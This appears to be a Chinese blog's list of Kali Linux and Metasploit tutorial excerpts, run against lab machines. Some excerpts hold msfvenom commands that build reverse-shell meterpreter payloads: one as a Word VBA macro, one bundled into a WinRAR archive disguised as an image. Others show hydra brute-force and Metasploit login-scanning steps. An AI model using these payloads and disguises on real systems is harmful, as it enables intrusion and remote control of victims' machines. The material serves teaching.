网络安全
文章平均质量分 75
极客事纪
这个作者很懒,什么都没留下…
展开
-
Docker+ Kubernetes已成为云计算的主流
k8s和Docker的胜利,意味着这是有史以来第一次,无论使用哪一种云平台,研发人员都可以拥有完全相同的计算环境。原创 2022-04-19 18:00:00 · 823 阅读 · 0 评论 -
Linux云计算之VSFTP服务器概述-安装vsftp服务器端、客户端
VSFTP服务器概述FTP服务概述FTP服务器(File Transfer ProtocolServer)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。FTP(File Transfer Protocol: 文件传输协议)作用:Internet 上用来传送文件的协议。常见FTP服务器:Windows:Serv-U 、FTP Server、filezilla_serverLinux:ProFTPD:(Professional FTP daemon)一个Unix平台上或原创 2022-03-31 16:37:16 · 5822 阅读 · 0 评论 -
网络安全kali之利用宏感染word文档获取shell
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。┌──(root💀xuegod53)-[~]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe执行完成后会生成2段代码第一段代码是MACRO CODE [ˈmækrəʊ k原创 2022-03-25 17:02:01 · 8258 阅读 · 3 评论 -
网络安全Kali之基于SSH、FTP协议收集信息
基于SSH协议收集信息查看ssh服务的版本信息msf6 > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(scanner/ssh/ssh_version) > show optionsmsf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180msf6 auxiliary(scanner/ssh/ssh_version) > run对SSH原创 2022-03-24 16:18:58 · 6030 阅读 · 1 评论 -
网络安全 Kali web安全 基于SMB协议收集信息
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common Internet File System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。原创 2022-03-23 16:42:32 · 674 阅读 · 0 评论 -
网络安全 kali Web安全之CSRF攻击
CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。原创 2022-03-16 16:33:29 · 917 阅读 · 0 评论 -
Web安全渗透测试基本流程
对于web应用的渗透测试,大致可分为三个阶段:信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程,以下通过9个阶段来描述渗透测试的整个流程:1.明确目标1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能否修改上传、能否提权…目标系统介绍、重点保护对象及特性。是否允许数据破坏?是否允许阻断业务正常运行?测试之前是否应当知会相关部门接口人?接入方式?外网和内网?测试是发现问题就算.原创 2022-03-15 16:17:19 · 2887 阅读 · 0 评论 -
网络安全 kali web安全【渗透测试】目录遍历漏洞
许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名形如:http://www.nuanyue.com/getfile=image.jgp当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/images/image.jpg”,将读取的内容返回给访问者。初看,在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网原创 2022-03-14 16:47:49 · 718 阅读 · 0 评论 -
【Kali】中密码暴力破解工具hydra的使用
前言hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。hydra参数讲解-R #继续从上一次进度接着破解。-S #采用SSL链接。-s #PORT 可通过这个参数指定非默认端口。-l #LOGIN 指定破解的用户,对特定用户破解。-L #FILE 指定用户名字典。-p #PASS 小写,指定密码破解,少用,一般是采用密原创 2022-03-10 16:05:10 · 15606 阅读 · 5 评论 -
Linux curl命令详解
命令:curl在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具,可以说是一款很强大的http命令行工具。它支持文件的上传和下载,是综合传输工具,但按传统,习惯称url为下载工具。语法:# curl [option] [url]常见参数:-A/--user-agent <string> 设置用户代理发送给服务器-b/--cookie <name=string/file> cookie字符串或文件读取位置-c/--coo原创 2022-03-09 16:08:27 · 4602 阅读 · 0 评论 -
网络安全kali web安全 Kali之msf简单的漏洞利用
信息收集靶机的IP地址为:192.168.173.136利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本:Windows server 2003开放的端口及服务:21/tcp ftp135/tcp msrpc139/tcp netbios-ssn445/tcp microsoft-ds777/tcp multiling-http1025/tcp NFS-or-IIS1026/tcp LSA-or-nterm1029/tcp ms原创 2022-03-08 15:57:32 · 12227 阅读 · 4 评论 -
Kali入门配置使用(一)
Kali Linux是基于Debian的Linux发行版,设计用于数字取证操作系统。Kali Linux预装了许多渗透测试软件,包括nmap、Wireshark、John the Ripper,以及Aircrack-ng.用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook原创 2022-03-07 16:35:03 · 3241 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 Metasploit---基于SMB协议收集信息
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common InternetFile System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。使用smb_version 基于SMB协议扫描版本号msf6 > use auxiliary.原创 2022-03-04 16:42:40 · 3021 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 Metasploit---基于tcp协议收集主机信息
我们前面学习了主动信息收集和被动信息收集,而且还学习了漏洞检测工具NESSUS,接下来给大家讲解使用Metasploit来对目标进行信息收集,这个过程包含了前面所有的方式以及多了一些更加极端的获取信息方式,比如获取服务器的硬件信息,系统用户信息、进程信息等。使用Metasploit中的nmap和arp_sweep 收集主机信息Metasploit中也有NMAP工具┌──(root💀xuegod53)-[~]└─# msfconsolemsf6 > db_nmap -sV 192.168原创 2022-03-03 16:37:53 · 3594 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180原创 2022-03-02 14:15:43 · 3290 阅读 · 2 评论 -
网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。原创 2022-02-28 15:19:32 · 2261 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。这篇文章教大家了解Metasploit基本使用方法以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测原创 2022-02-25 17:08:34 · 3009 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。这篇文章教大家了解Metasploitable2靶机系统以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套原创 2022-02-24 17:36:01 · 4256 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 Metasploit 渗透测试框架介绍
Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。这篇文章教大家了解渗透测试整体框架以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境原创 2022-02-22 17:29:34 · 400 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 如何进行NESSUS漏洞检测
NESSUS简介1998年,Nessus的创办人Renaud Deraison展开了一项名为"Nessus"的计划,其计划目的是希望能为互联网社群提供一个免费、威力强大、更新频繁并简易使用的远端系统安全扫描程式。2002年时,Renaud与Ron Gula, Jack Huffard创办了一个名为Tenable Network Security机构。在第三版的Nessus释出之时,该机构收回了Nessus的版权与程式源代码(原本为开放源代码),并注册了nessus.org成为该机构的网站。目前此机构位于美原创 2022-02-21 17:23:36 · 3246 阅读 · 1 评论 -
网络安全kali渗透学习 web渗透入门 NAMP高级使用技巧和如何进行漏洞挖掘
nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。这篇文章教大家使用NMAP的技巧和如何进行漏洞扫描以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公原创 2022-02-18 17:48:21 · 1492 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 使用WireShark对常用协议抓包
协议分析的时候我们关闭混淆模式,避免一些干扰的数据包存在。这篇文章教大家如何使用WireShark对常用协议抓包并分析原理以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!常用协议分析-ARP协议原创 2022-02-17 18:31:34 · 1389 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 WireShark抓包及常用协议分析
Wireshark是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。这篇文章教大家WireShark抓包及常用协议分析以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili文字版↓:年底了原创 2022-02-16 17:32:23 · 4183 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 DDOS的原理和防护
DDOS分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。这篇文章教大家DDOS的原理和防护以下有视频版还有文字版不知道怎么操作的请看文字版的,里面详细的步骤。关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/原创 2022-02-15 17:31:47 · 2382 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门 如何进行基于Nmap的扫描方式
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。nmap扫主要包括四个方面的扫描功能分别是主机发现(Host Discovery)、端口扫描(Port Scanning)、应用与版本侦测(Version Detection)、操作系统侦测(Operating System Detection)。这四项功能之间,又存在大致的依赖关系。这篇文章教大家如何进行基于Nmap的扫描以原创 2022-02-14 17:39:11 · 811 阅读 · 0 评论 -
网络安全kali渗透学习 web渗透入门kali系统的安装和使用。
kali最新系统安装,最新的系统界面和主题迎来了很大的改善,给用户带来了视觉上的焕然一新,其中,这一次更新也打破了以往默认用户为root的方式;底部有已经安装好的,下载之后,请到我主页找到修改密码的文章希望这篇文章能够帮助所有刚刚入门准备学网安的人们能够成功安装kali系统以下有视频版还有文字版不知道怎么下载kali系统的请看文字版的,里面含有下载好的kali系统关注公众号侠盗男爵回复【kali系统】视频版↓:网络安全/黑客防御/kali渗透测试/wbe安全-小白入门到精通 全套10000集大原创 2022-01-14 15:21:12 · 4717 阅读 · 0 评论 -
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
XSS 跨站脚本攻击使用 JavaScript 创建 CookieJavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。例 1:JavaScript 中,创建 cookie 如下所示:document.cookie=“username=John Doe”;例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在浏览器关闭时删除:document.cookie=“username=John原创 2021-12-31 13:33:57 · 1413 阅读 · 0 评论 -
Kali Linux-配置Kali的apt命令在线安装包的源为国内源和apt和apt-get的区别
Kali Rolling: 是Kali的即时更新版,只要Kali中有更新,更新包就会放入Kali Rolling中,供用户下载使用。它为用户提供了一个稳定更新的版本,同时会带有最新的更新安装包。这个是我们最常用的源。在Kali Rolling下有3类软件包:main、non-free和contrib。Kali apt源的软件包类型说明:dists区域 软件包组件标准main 遵从 Debian 自由软件指导方针(DFSG),并且不依赖于 non-freecontrib 遵从 Debian 自由原创 2021-12-27 14:28:47 · 1664 阅读 · 2 评论 -
kali Linux-网络安全实战-使用msf扫描靶机上mysql服务的空密码
实战-使用msf扫描靶机上mysql服务的空密码我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180登录Metasploitable2-Linux系统用户名root,密码:123456输入ip a 查看ip地址登录Kali开始搜索模块msf6> search mysql_login加载模块msf6 > use auxiliary/scanner/mysql/mysql_login查看模块配置项msf6 auxilia原创 2021-12-22 16:41:26 · 6029 阅读 · 7 评论 -
黑客之道--网络安全之被动信息收集
1.1被动信息收集概述和目的信息收集的方式可以分为两种:被动和主动。被动信息收集方式是指利用第三方的服务对目标进行访问了解,比例:Google搜索。主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。比如:nmap扫描端口。被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。更多技术干货尽在公众号【学神来啦】!1.2 信息收集内容IP地址段域名信息邮件地址文档图⽚数据公司地址公司组织架构联原创 2021-11-19 14:08:01 · 6838 阅读 · 0 评论 -
网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理
文章目录生成伪装恶意程序的封面图标捆绑恶意程序和图片并设置自动运行使用Unicode字符修改文件名后缀通过访问图片自动获取目标shell生成伪装恶意程序的封面图标需要安装rar压缩工具。WinRAR官网:http://www.winrar.com.cn/下载安装即可不需要特殊配置。msfvenom生成exe┌──(root????xuegod53)-[~]└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53原创 2021-11-15 15:31:04 · 5417 阅读 · 4 评论 -
《黑客之道》—网络安全之制作windows和linux客户端恶意软件进行渗透
原创 2021-11-11 14:39:20 · 2481 阅读 · 0 评论 -
《黑客之道》—网络安全之Metasploit渗透测试之信息收集
原创 2021-11-10 16:04:31 · 1275 阅读 · 0 评论 -
《黑客之道》—网络安全之Metasploit渗透测试框架的基本使用
原创 2021-11-09 13:46:06 · 301 阅读 · 0 评论 -
《黑客之道》kali Linux之NMAP高级使用技巧和漏洞扫描发现
原创 2021-11-04 11:45:13 · 360 阅读 · 0 评论 -
《黑客之道》- kali LInux之WireShark抓包及常用协议分析
原创 2021-11-03 11:45:11 · 842 阅读 · 0 评论 -
Linux云计算-网络管理技术 OSI 七层模型和 TCP/IP 四层模型
文章目录OSI 七层参考模型,TCP/IP 四层参考模型常见网络相关的协议TCP 和 UDP 常用端口号名称IP 地址分类公众号:“学神来啦”OSI 七层参考模型,TCP/IP 四层参考模型OSI 七层模型:OSI(Open System Interconnection)开放系统互连参考模型是国际标准化组织(ISO)制定的一个用于计算机或通信系统间互联的标准体系。TCP/IP 四层模型:TCP/IP 参考模型是计算机网络的祖父 ARPANET 和其后继的因特网使用的参考模型。分层作原创 2021-08-06 15:41:00 · 684 阅读 · 52 评论 -
网络安全工程师必看-网络安全法条例-国家安全法介绍和案例
文章目录导读一、黑客违法判刑标准《刑法》第二百八十五条第二百八十六条二 、网络安全法条规细则三 、网络安全的违法案例导读法律就是秩序,有好的法律才有好的秩序——亚里士多德中国工程院院士李建成教授指出,“网络安全建设,应当以法律为根,技术为基。”《网络安全法》是在吸取国内外立法经验的基础上,经过多次公开征集意见,人大常委会三次审议之后完成的。尽管立法过程历时较短,但其中不乏制度亮点。专用词解释:(一)网络,是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息进行收集、存储、传.原创 2021-07-06 10:21:50 · 1079 阅读 · 0 评论 -
Kali Linux --《网络安全》-- 使用 WireShark 对常用协议抓包并分析原理
文章目录前言常用协议分析-ARP 协议常用协议分析-ICMP 协议常用协议分析-TCP 协议常用协议分析-HTTP 协议前言作为一款高效免费的抓包工具,wireshark可以捕获并描述网络数据包,其最大的优势就是免费、开源以及多平台支持,在GNU通用公共许可证的保障范围下,用户可以免费获取软件和代码,并拥有对其源码修改和定制的权利,如今其已是全球最广泛的网络数据包分析软件之一。接下来我就带大家用WireShark 实战:使用 WireShark 对常用协议抓包并分析原理常用协议分析-ARP原创 2021-08-03 13:31:52 · 4374 阅读 · 63 评论